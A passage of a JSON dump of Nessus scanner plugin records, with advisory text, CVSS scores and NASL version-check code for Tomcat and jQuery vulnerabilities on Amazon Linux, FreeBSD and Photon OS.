LISTEN 25772/java\n\nTo re-enable the AJP port in Tomcat, users can follow the steps \nbelow :\n\n1) For AL2 Core (tomcat7): Uncomment the following line in\n/etc/tomcat/server.xml and restart the service\n\n<!--\n\n<Connector port='8009' protocol='AJP/1.3' redirectPort='8443' />\n\n-->\n\n2) For AL2 Tomcat8.5 extra: Uncomment the following line in\n/etc/tomcat/server.xml and restart the service\n\n<!--\n\n<Connector protocol='AJP/1.3'\n\naddress='::1'\n\nport='8009'\n\nredirectPort='8443' />\n\n-->\n\nSee also :\n\nApache Tomcat release notes\n\nTomcat 7\n\n<a\nhref='http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_\n8.5.51'>Tomcat 8\n\nRedHat <a href='https://access.redhat.com/solutions/4851251'>solutions", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-03-16T00:00:00", "title": "Amazon Linux 2 : tomcat (ALAS-2020-1402)", "type": "nessus", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1304", "CVE-2018-8014", "CVE-2018-1305", "CVE-2018-8034", "CVE-2020-1938"], "modified": "2020-03-16T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat-javadoc", "p-cpe:/a:amazon:linux:tomcat", "p-cpe:/a:amazon:linux:tomcat-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat-admin-webapps", "cpe:/o:amazon:linux:2", "p-cpe:/a:amazon:linux:tomcat-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat-docs-webapp", "p-cpe:/a:amazon:linux:tomcat-lib", "p-cpe:/a:amazon:linux:tomcat-webapps", "p-cpe:/a:amazon:linux:tomcat-jsvc"], "id": "AL2_ALAS-2020-1402.NASL", "href": "https://www.tenable.com/plugins/nessus/134569", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2020-1402.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134569);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/18\");\n\n script_cve_id(\"CVE-2018-1304\", \"CVE-2018-1305\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2020-1938\");\n script_xref(name:\"ALAS\", value:\"2020-1402\");\n\n script_name(english:\"Amazon Linux 2 : tomcat (ALAS-2020-1402)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The host name verification when using TLS with the WebSocket client\nwas missing. It is now enabled by default. Versions Affected: Apache\nTomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and\n7.0.35 to 7.0.88. (CVE-2018-8034)\n\nThe URL pattern of '' (the empty string) which exactly maps to the\ncontext root was not correctly handled in Apache Tomcat 9.0.0.M1 to\n9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when\nused as part of a security constraint definition. This caused the\nconstraint to be ignored. It was, therefore, possible for unauthorised\nusers to gain access to web application resources that should have\nbeen protected. Only security constraints with a URL pattern of the\nempty string were affected. (CVE-2018-1304)\n\nSecurity constraints defined by annotations of Servlets in Apache\nTomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and\n7.0.0 to 7.0.84 were only applied once a Servlet had been loaded.\nBecause security constraints defined in this way apply to the URL\npattern and any URLs below that point, it was possible - depending on\nthe order Servlets were loaded - for some security constraints not to\nbe applied. This could have exposed resources to users who were not\nauthorised to access them. (CVE-2018-1305)\n\nThe defaults settings for the CORS filter provided in Apache Tomcat\n9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to\n7.0.88 are insecure and enable 'supportsCredentials' for all origins.\nIt is expected that users of the CORS filter will have configured it\nappropriately for their environment rather than using it in the\ndefault configuration. Therefore, it is expected that most users will\nnot be impacted by this issue. (CVE-2018-8014)\n\nWhen using the Apache JServ Protocol (AJP), care must be taken when\ntrusting incoming connections to Apache Tomcat. Tomcat treats AJP\nconnections as having higher trust than, for example, a similar HTTP\nconnection. If such connections are available to an attacker, they can\nbe exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1\nto 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with\nan AJP Connector enabled by default that listened on all configured IP\naddresses. It was expected (and recommended in the security guide)\nthat this Connector would be disabled if not required. This\nvulnerability report identified a mechanism that allowed: - returning\narbitrary files from anywhere in the web application - processing any\nfile in the web application as a JSP Further, if the web application\nallowed file upload and stored those files within the web application\n(or the attacker was able to control the content of the web\napplication by some other means) then this, along with the ability to\nprocess a file as a JSP, made remote code execution possible. It is\nimportant to note that mitigation is only required if an AJP port is\naccessible to untrusted users. Users wishing to take a\ndefence-in-depth approach and block the vector that permits returning\narbitrary files and execution as JSP may upgrade to Apache Tomcat\n9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to\nthe default AJP Connector configuration in 9.0.31 to harden the\ndefault configuration. It is likely that users upgrading to 9.0.31,\n8.5.51 or 7.0.100 or later will need to make small changes to their\nconfigurations. (CVE-2020-1938)\n\nAs part of our fix for this CVE, we are disabling Tomcat 2019 AJP\nconnector in the default configuration in alignment with the upstream\nchanges. This change will require customers who use the default Tomcat\nconfiguration (in which the AJP connector was previously enabled) to\nexplicitly re-enable the connector if they need it. Also take note\nthat a connector configured without an explicit address will only bind\nto the loopback address.\n\nExamples of output from netstat before and after updating tomcat8 and\ntomcat7 are below (note that it is the same on AL1 and AL2 with both\ntomcat7 and tomcat8).\n\nAL2 tomcat8.5 :\n\nbefore :\n\ntcp6 0 0 :::8009 :::* LISTEN 25772/java\n\ntcp6 0 0 :::8080 :::* LISTEN 25772/java\n\ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nAfter :\n\ntcp6 0 0 :::8080 :::* LISTEN 25772/java\n\ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nTo re-enable the AJP port in Tomcat, users can follow the steps \nbelow :\n\n1) For AL2 Core (tomcat7): Uncomment the following line in\n/etc/tomcat/server.xml and restart the service\n\n<!--\n\n<Connector port='8009' protocol='AJP/1.3' redirectPort='8443' />\n\n-->\n\n2) For AL2 Tomcat8.5 extra: Uncomment the following line in\n/etc/tomcat/server.xml and restart the service\n\n<!--\n\n<Connector protocol='AJP/1.3'\n\naddress='::1'\n\nport='8009'\n\nredirectPort='8443' />\n\n-->\n\nSee also :\n\nApache Tomcat release notes\n\nTomcat 7\n\n<a\nhref='http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_\n8.5.51'>Tomcat 8\n\nRedHat <a href='https://access.redhat.com/solutions/4851251'>solutions\"\n );\n # http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.100\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?177285c3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2020-1402.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update tomcat' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-admin-webapps-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-docs-webapp-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-el-2.2-api-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-javadoc-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-jsp-2.2-api-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-jsvc-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-lib-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-servlet-3.0-api-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-webapps-7.0.76-10.amzn2.0.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-29T00:07:34", "description": "BestPractical reports :\n\nThe version of jQuery used in RT 4.2 and 4.4 has a Cross-site\nScripting (XSS) vulnerability when using cross-domain Ajax requests.\nThis vulnerability is assigned CVE-2015-9251. RT does not use this\njQuery feature so it is not directly vulnerable. jQuery version 1.12\nno longer receives official updates, however a fix was posted with\nrecommendations for applications to patch locally, so RT will follow\nthis recommendation and ship with a patched version.", "edition": 24, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-03-07T00:00:00", "title": "FreeBSD : rt -- XSS via jQuery (416ca0f4-3fe0-11e9-bbdd-6805ca0b3d42)", "type": "nessus", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9251"], "modified": "2021-07-02T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:rt44", "p-cpe:/a:freebsd:freebsd:rt42"], "id": "FREEBSD_PKG_416CA0F43FE011E9BBDD6805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/122657", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122657);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2020/02/06\");\n\n script_cve_id(\"CVE-2015-9251\");\n\n script_name(english:\"FreeBSD : rt -- XSS via jQuery (416ca0f4-3fe0-11e9-bbdd-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"BestPractical reports :\n\nThe version of jQuery used in RT 4.2 and 4.4 has a Cross-site\nScripting (XSS) vulnerability when using cross-domain Ajax requests.\nThis vulnerability is assigned CVE-2015-9251. RT does not use this\njQuery feature so it is not directly vulnerable. jQuery version 1.12\nno longer receives official updates, however a fix was posted with\nrecommendations for applications to patch locally, so RT will follow\nthis recommendation and ship with a patched version.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://docs.bestpractical.com/release-notes/rt/4.4.4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://docs.bestpractical.com/release-notes/rt/4.2.16\"\n );\n # https://vuxml.freebsd.org/freebsd/416ca0f4-3fe0-11e9-bbdd-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7f36c19e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rt42\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rt44\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rt42>=4.2.0<4.2.16\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rt44>=4.4.0<4.4.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-29T00:52:54", "description": "The version of JQuery library hosted on the remote web\nserver is prior to 3.0.0. It is, therefore, affected by\na cross site scripting vulnerability when a cross-domain\nAjax request is performed without the dataType option,\ncausing text/javascript responses to be executed", "edition": 24, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-05-15T00:00:00", "title": "JQuery < 3.0.0 XSS", "type": "nessus", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9251"], "modified": "2021-07-02T00:00:00", "cpe": [], "id": "JQUERY_3_0_0.NASL", "href": "https://www.tenable.com/plugins/nessus/125152", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125152);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/10/30 13:24:46\");\n\n script_cve_id(\"CVE-2015-9251\");\n\n script_name(english:\"JQuery < 3.0.0 XSS\");\n script_summary(english:\"Checks the version of JQuery.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a cross site scripting\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of JQuery library hosted on the remote web\nserver is prior to 3.0.0. It is, therefore, affected by\na cross site scripting vulnerability when a cross-domain\nAjax request is performed without the dataType option,\ncausing text/javascript responses to be executed\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blog.jquery.com/2016/06/09/jquery-3-0-final-released/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to JQuery version 3.0.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-9251\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"jquery_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/jquery\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = 'jquery';\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nport = get_http_port(default:80);\napp_info = vcf::get_app_info(app:appname, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [{'fixed_version':'3.0.0'}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING,flags:{xss:TRUE});\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-02-08T12:48:16", "description": "An update of 'apache-tomcat' packages of Photon OS has been released.", "edition": 4, "published": "2018-08-17T00:00:00", "title": "Photon OS 2.0: Apache PHSA-2018-2.0-0065 (deprecated)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8014"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:apache", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2018-2_0-0065.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111952", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0065. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111952);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:51\");\n\n script_cve_id(\"CVE-2018-8014\");\n\n script_name(english:\"Photon OS 2.0: Apache PHSA-2018-2.0-0065 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of 'apache-tomcat' packages of Photon OS has been released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-2-65\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93f4e21b\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"apache-tomcat-8.5.31-3.ph2\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache\");\n}\n", "cvss": {"score": 7.5, "vector": 